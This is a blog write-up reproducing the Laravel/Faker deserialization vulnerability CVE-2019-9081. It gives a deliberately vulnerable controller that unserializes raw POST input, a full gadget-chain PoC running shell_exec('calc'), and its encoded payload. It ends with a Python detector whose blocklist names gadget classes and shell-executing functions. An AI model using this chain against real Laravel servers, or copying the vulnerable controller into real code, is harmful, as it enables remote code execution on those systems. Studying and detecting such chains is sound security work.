cve-2019-9081-recurrence

Recently 翔哥 asked me about reproducing cve-2019-9081.

References:

https://www.bilibili.com/video/BV1eX4y1F7bt/?spm_id_from=333.999.0.0&vd_source=cdd18b27eaae23edd6c77017f7ce08b4

https://blog.csdn.net/qq_46918279/article/details/120519297


0x00 Background

Yii and Laravel are both concise, elegant PHP web frameworks. Composer is PHP's package manager and dependency manager: with it, a single command pulls other people's well-written code into a project, and managing dependencies, updating and removing packages is straightforward. (ThinkPHP is a fast, compatible and simple lightweight PHP framework developed in China.)

0x01 Some bugs

I just followed the video from the references step by step and pushed through the problems. One small snag was how to write the controller and the route; see:

https://www.php.cn/phpkj/laravel/492215.html

The relevant code:

// AdminController.php
<?php
namespace App\Http\Controllers;

use Illuminate\Http\Request;
use Illuminate\Routing\Controller;

class AdminController extends Controller
{
    // GET shows a CSRF token and a hint; POST deserializes the 'ctfshow' parameter.
    public function getPostIndex(Request $request)
    {
        if ($request->isMethod('GET')) {
            echo "<input type=\"hidden\" name=\"_token\" value=\"" . csrf_token() . "\">";
            return 'post ctfshow to unserialize';
        }
        if ($request->isMethod('POST')) {
            echo "enter";
            $data = $request->input('ctfshow');
            // Deliberately vulnerable: attacker-controlled input goes straight into unserialize().
            $res = unserialize($data);
        }
    }
}

And add to routes/web.php:

Route::match(['GET', 'POST'], '/admin', 'AdminController@getPostIndex');

0x02 Summary & PoC

I actually learned far more than what the blog posts show; the most time-consuming part was sitting down and trying things one at a time. To sum up, the chain is not long.

(image: image-20221212170015031)

// poc.php
<?php
namespace Faker;

// Faker\DefaultGenerator::__call() returns $this->default for any method name,
// so the command string becomes the "generated" value.
class DefaultGenerator
{
    protected $default;
    function __construct()
    {
        $this->default = 'calc';
    }
}

// Faker\ValidGenerator::__call() forwards the call to $this->generator and then
// runs call_user_func($this->validator, $result): here shell_exec('calc').
class ValidGenerator
{
    protected $generator;
    protected $validator;
    protected $maxRetries;
    function __construct()
    {
        $this->generator = new DefaultGenerator();
        $this->validator = 'shell_exec';
        $this->maxRetries = 1;
    }
}

namespace Illuminate\Broadcasting;
use Faker\ValidGenerator;

// Entry point: PendingBroadcast::__destruct() calls $this->events->dispatch($this->event);
// ValidGenerator has no dispatch(), so its __call() takes over.
class PendingBroadcast
{
    protected $events;
    protected $event;

    function __construct()
    {
        $this->events = new ValidGenerator();
        $this->event = 'good!';
    }
}

echo urlencode(serialize(new PendingBroadcast()));
?>

Output:

O%3A40%3A%22Illuminate%5CBroadcasting%5CPendingBroadcast%22%3A2%3A%7Bs%3A9%3A%22%00%2A%00events%22%3BO%3A20%3A%22Faker%5CValidGenerator%22%3A3%3A%7Bs%3A12%3A%22%00%2A%00generator%22%3BO%3A22%3A%22Faker%5CDefaultGenerator%22%3A1%3A%7Bs%3A10%3A%22%00%2A%00default%22%3Bs%3A4%3A%22calc%22%3B%7Ds%3A12%3A%22%00%2A%00validator%22%3Bs%3A10%3A%22shell_exec%22%3Bs%3A13%3A%22%00%2A%00maxRetries%22%3Bi%3A1%3B%7Ds%3A8%3A%22%00%2A%00event%22%3Bs%3A5%3A%22good%21%22%3B%7D
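As an added defensive example (my own code, not from the original post or from Laravel/Faker), the check below URL-decodes a request parameter, parses the PHP serialization format and reports which class names and callable-looking strings it carries; on the payload above it flags the three gadget classes and shell_exec. The GADGET_CLASSES and DANGEROUS_CALLABLES sets are assumptions for a starting blocklist, and the parser only handles the i, s, a and O types the chain uses.

```python
from urllib.parse import unquote_to_bytes

# Chain classes seen above and PHP callables no client should supply; a starting blocklist only (assumed).
GADGET_CLASSES = {b"Illuminate\\Broadcasting\\PendingBroadcast",
                  b"Faker\\ValidGenerator", b"Faker\\DefaultGenerator"}
DANGEROUS_CALLABLES = {b"shell_exec", b"system", b"exec", b"passthru", b"popen",
                       b"proc_open", b"assert"}

def parse_value(data, pos, seen):
    """Parse one PHP-serialized value at byte offset pos (PHP lengths count bytes),
    recording class names and string leaves in seen; returns (value, offset past it)."""
    tag = data[pos:pos + 1]
    if tag == b"i":                                  # i:1;
        end = data.index(b";", pos)
        return int(data[pos + 2:end]), end + 1
    if tag == b"s":                                  # s:<len>:"<bytes>";
        colon = data.index(b":", pos + 2)
        start, length = colon + 2, int(data[pos + 2:colon])
        seen["strings"].append(data[start:start + length])
        return data[start:start + length], start + length + 2
    if tag in (b"a", b"O"):                          # a:<n>:{..}  O:<len>:"<cls>":<n>:{..}
        p = pos + 2
        if tag == b"O":
            colon = data.index(b":", p)
            cls = data[colon + 2:colon + 2 + int(data[p:colon])]
            seen["classes"].append(cls)
            p = colon + 4 + len(cls)                 # skip '":' after the class name
        colon = data.index(b":", p)
        count, p, items = int(data[p:colon]), colon + 2, {}
        for _ in range(count):                       # alternating key, value
            key, p = parse_value(data, p, seen)
            items[key], p = parse_value(data, p, seen)
        return items, p + 1                          # skip closing '}'
    raise ValueError(f"unsupported tag {tag!r} at offset {pos}")

def inspect_param(encoded):
    """Decode one URL-encoded parameter and report serialized-object markers."""
    data = unquote_to_bytes(encoded)
    if not data.startswith((b"O:", b"a:")):
        return {"serialized": False, "classes": [], "gadgets": [], "callables": []}
    seen = {"classes": [], "strings": []}
    parse_value(data, 0, seen)
    return {"serialized": True, "classes": [c.decode() for c in seen["classes"]],
            "gadgets": sorted(c.decode() for c in set(seen["classes"]) & GADGET_CLASSES),
            "callables": sorted(s.decode() for s in set(seen["strings"]) & DANGEROUS_CALLABLES)}

# Constructed sample: the URL-encoded chain printed by poc.php above.
SAMPLE = ("O%3A40%3A%22Illuminate%5CBroadcasting%5CPendingBroadcast%22%3A2%3A%7Bs%3A9%3A%22%00%2A%00events%22%3BO%3A20%3A%22Faker%5CValidGenerator%22%3A3%3A%7B"
          "s%3A12%3A%22%00%2A%00generator%22%3BO%3A22%3A%22Faker%5CDefaultGenerator%22%3A1%3A%7Bs%3A10%3A%22%00%2A%00default%22%3Bs%3A4%3A%22calc%22%3B%7D"
          "s%3A12%3A%22%00%2A%00validator%22%3Bs%3A10%3A%22shell_exec%22%3Bs%3A13%3A%22%00%2A%00maxRetries%22%3Bi%3A1%3B%7Ds%3A8%3A%22%00%2A%00"
          "event%22%3Bs%3A5%3A%22good%21%22%3B%7D")
```

A plain string or a serialized array with no objects comes back with empty class and callable lists, so the same function can sit in front of any parameter that is later passed to unserialize().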

0x03 Another chain

Try to find other chains on your own.

To be continued.

2022-12-11

© 2024 wd-z711